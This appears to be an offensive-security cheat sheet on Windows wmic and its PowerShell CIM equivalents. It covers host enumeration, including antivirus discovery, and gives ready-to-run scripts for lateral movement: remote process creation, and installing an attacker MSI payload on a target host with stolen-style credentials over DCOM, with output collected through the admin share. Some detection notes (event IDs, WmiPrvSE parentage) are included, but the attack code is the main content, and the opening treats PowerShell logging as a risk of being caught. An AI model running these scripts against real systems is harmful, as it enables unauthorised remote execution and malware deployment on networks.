The wmic command on Windows is extremely useful, but is also deprecated: Microsoft marked it deprecated in Windows 10 21H1 and the 21H1 release of Windows Server, officially because it is superseded by the PowerShell WMI/CIM cmdlets (its popularity with attackers did not help). It is still present on later Windows 10 and Windows 11 builds, but from Windows 11 24H2 it is an optional Feature on Demand that is not installed by default. Where wmic.exe is missing, the PowerShell cmdlets (Get-CimInstance, Invoke-CimMethod) have to be used instead, which increases the risk that the activity is captured by PowerShell script block and module logging.

  • wmic product get name,version,vendor — list installed software (Win32_Product only knows about MSI-installed products, so anything installed by an EXE installer is missed; the query is also slow and noisy, because Windows Installer verifies every package and writes an MsiInstaller event 1035 per product to the Application log)
  • wmic service get name,displayname,pathname,startmode — list all services
  • wmic qfe get caption,description,hotfixid,installedon — list installed updates
  • wmic service list brief — another way of listing services
  • wmic service where "name like '$SERVICE_NAME'" get name,pathname — get information about a particular service (WQL like uses % as the wildcard, e.g. 'Spool%')
  • wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayName,productState — enumerate antivirus (client SKUs only; the SecurityCenter2 namespace does not exist on Windows Server)
  • wmic useraccount get name,sid — display names and SIDs of local users (on a domain-joined host this also walks domain accounts and can be very slow; add where localaccount=true to restrict it to local ones)
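As an added example (not part of the original notes), the same enumeration done with the PowerShell CIM cmdlets, for hosts where wmic.exe is not installed. The registry Uninstall keys are included as a complement to Win32_Product, since they also cover EXE-installed and 32-bit-on-64-bit software. `$ServiceName` is an assumed placeholder, and the productState decoding follows the commonly used community interpretation of the bitmask, not a documented Microsoft format.

```powershell
# Added example, not from the original notes. Assumes Windows PowerShell 5.1 or later.

# wmic product get name,version,vendor
# Win32_Product = MSI-installed products only; slow, and logs MsiInstaller 1035 per product.
Get-CimInstance -ClassName Win32_Product |
    Select-Object Name, Version, Vendor

# Complement: both Uninstall hives, so EXE installers and 32-bit apps on 64-bit Windows show up too.
$uninstallKeys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
                 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
    Where-Object DisplayName |
    Select-Object DisplayName, DisplayVersion, Publisher |
    Sort-Object DisplayName

# wmic service get name,displayname,pathname,startmode
Get-CimInstance -ClassName Win32_Service |
    Select-Object Name, DisplayName, PathName, StartMode

# wmic qfe get caption,description,hotfixid,installedon
Get-CimInstance -ClassName Win32_QuickFixEngineering |
    Select-Object HotFixID, Description, InstalledOn

# wmic service where "name like '...'" get name,pathname   (WQL LIKE wildcard is %)
$ServiceName = 'Spool'   # assumed placeholder
Get-CimInstance -Query "SELECT Name, PathName FROM Win32_Service WHERE Name LIKE '%$ServiceName%'" |
    Select-Object Name, PathName

# wmic /namespace:\\root\securitycenter2 path antivirusproduct   (client SKUs only)
function ConvertFrom-ProductState {
    # Community decoding of the productState bitmask: hex digits 3-4 = enabled flag,
    # hex digits 5-6 = signature status. Not officially documented by Microsoft.
    param([int]$State)
    $hex = '{0:x6}' -f $State
    [pscustomobject]@{
        Enabled  = $hex.Substring(2, 2) -in '10', '11'
        UpToDate = $hex.Substring(4, 2) -eq '00'
    }
}
try {
    Get-CimInstance -Namespace 'root\SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction Stop |
        ForEach-Object {
            $st = ConvertFrom-ProductState $_.productState
            [pscustomobject]@{
                Product  = $_.displayName
                Enabled  = $st.Enabled
                UpToDate = $st.UpToDate
                Exe      = $_.pathToSignedProductExe
            }
        }
} catch {
    Write-Warning "root\SecurityCenter2 not available (server SKU?): $($_.Exception.Message)"
}

# wmic useraccount where localaccount=true get name,sid
Get-CimInstance -ClassName Win32_UserAccount -Filter 'LocalAccount = TRUE' |
    Select-Object Name, SID
```

Get-CimInstance defaults to WinRM rather than DCOM when pointed at a remote host with -ComputerName, so the local queries above can be run against a remote target by adding -ComputerName (or a CIM session) without other changes.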

Remote process creation

wmic.exe /user:$TARGET_USER `
         /password:$TARGET_PASSWORD `
         /node:$TARGET_HOST `
    process call create "$SOME_COMMAND"

The process is spawned on the target by WmiPrvSE.exe, non-interactively and with no console: only ReturnValue (0 = success) and ProcessId come back, so redirect output to a file and collect it afterwards. On the target this appears as a process creation (Security 4688 / Sysmon 1) with WmiPrvSE.exe as the parent, which is the usual detection. The backtick continuation above is PowerShell syntax; in cmd.exe use ^ instead, or put the command on one line.

Install an MSI package

wmic.exe /user:$TARGET_USER `
         /password:$TARGET_PASSWORD `
         /node:$TARGET_HOST `
    product call install PackageLocation=$PATH_TO_ATTACKER_MSI

PackageLocation is resolved on the target, not on the operator's machine. Because the remote WMI call runs under a network logon on the target, a UNC path often fails on the second hop unless the share allows unauthenticated read; staging the MSI to a local path on the target first (for example over the C$ admin share) is more reliable. Win32_Product.Install also accepts Options and AllUsers parameters.
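As an added example (not part of the original notes), both remote calls above done with the CIM cmdlets for hosts where wmic.exe is absent. All host, user and path values are assumed placeholders standing in for $TARGET_HOST, $TARGET_USER and $PATH_TO_ATTACKER_MSI; the MSI is assumed to have been staged to a local path on the target already.

```powershell
# Added example, not from the original notes. Placeholder values are assumptions.
$TargetHost  = 'WS01.corp.local'                                      # assumed
$Cred        = Get-Credential -UserName 'CORP\operator' -Message 'Target credentials'
$SomeCommand = 'cmd.exe /c whoami /all > C:\Windows\Temp\out.txt'    # WMI returns no output, so redirect it
$AttackerMsi = 'C:\Windows\Temp\payload.msi'                          # assumed; staged locally to avoid the double hop

# DCOM mirrors wmic's transport (RPC 135 + dynamic ports); drop -SessionOption to use WinRM instead.
$opt = New-CimSessionOption -Protocol Dcom
$cim = New-CimSession -ComputerName $TargetHost -Credential $Cred -SessionOption $opt

# Equivalent of: wmic /node:... process call create "<cmd>"
# Static method on the class; the child runs under WmiPrvSE.exe on the target.
$create = Invoke-CimMethod -CimSession $cim -ClassName Win32_Process -MethodName Create `
              -Arguments @{ CommandLine = $SomeCommand }
if ($create.ReturnValue -ne 0) {
    Write-Warning "Win32_Process.Create failed, ReturnValue $($create.ReturnValue)"
} else {
    "Started PID $($create.ProcessId) on $TargetHost"
}

# Equivalent of: wmic /node:... product call install PackageLocation=<msi>
# PackageLocation is read on the target. ReturnValue 0 = success, otherwise an msiexec error code.
$install = Invoke-CimMethod -CimSession $cim -ClassName Win32_Product -MethodName Install `
               -Arguments @{ PackageLocation = $AttackerMsi; AllUsers = $true }
"Win32_Product.Install ReturnValue: $($install.ReturnValue)"

# Collect the redirected output over the admin share (needs local admin on the target).
Start-Sleep -Seconds 2    # Create returns before the child finishes
$drive = New-PSDrive -Name T -PSProvider FileSystem -Root "\\$TargetHost\C$" -Credential $Cred
Get-Content 'T:\Windows\Temp\out.txt'
Remove-Item 'T:\Windows\Temp\out.txt'
Remove-PSDrive -Name T

Remove-CimSession $cim
```

Unlike wmic, no password appears on the command line here (it is prompted for or passed as a PSCredential), but the CIM session still authenticates over the network as $Cred, so the logon (Security 4624 type 3) and the WmiPrvSE.exe-parented process creation are visible on the target either way.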